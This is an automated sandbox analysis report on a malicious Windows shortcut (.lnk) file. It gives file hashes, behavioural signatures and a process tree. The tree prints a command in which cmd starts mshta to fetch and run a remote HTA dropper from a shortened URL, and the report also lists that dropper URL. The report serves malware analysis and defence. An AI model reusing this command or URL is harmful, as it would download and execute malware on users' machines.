Analysis
-
max time kernel
91s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 09:28
Static task
static1
Behavioral task
behavioral1
Sample
09bca3ddbc55f22577d2f3a7fda22d1c.lnk
Resource
win7-20240221-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
09bca3ddbc55f22577d2f3a7fda22d1c.lnk
Resource
win10v2004-20240226-en
windows10-2004-x64
4 signatures
150 seconds
General
-
Target
09bca3ddbc55f22577d2f3a7fda22d1c.lnk
-
Size
1KB
-
MD5
09bca3ddbc55f22577d2f3a7fda22d1c
-
SHA1
bc608400f9fc6c34f7ab230ee71a42920e90c9e7
-
SHA256
9ab13bfc2c60c1c15e677df76e8768e054d01d24f095cecf752491f785babc0b
-
SHA512
77ff79364d388489eb7814f3332629e242d0a77878c1b4c79eb26a1bf24a023417bf9b2fc9888c96139903ae50fa34484088776c297605a398631bb9af7f4efc
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://bit.ly/2U1JjGq
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2960 mshta.exe 7 2960 mshta.exe 9 2960 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1408 wrote to memory of 3748 1408 cmd.exe 87 PID 1408 wrote to memory of 3748 1408 cmd.exe 87 PID 3748 wrote to memory of 2960 3748 cmd.exe 88 PID 3748 wrote to memory of 2960 3748 cmd.exe 88
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\09bca3ddbc55f22577d2f3a7fda22d1c.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/2U1JjGq2⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\System32\mshta.exeC:\Windows\System32\mshta https://bit.ly/2U1JjGq3⤵
- Blocklisted process makes network request
PID:2960
-
-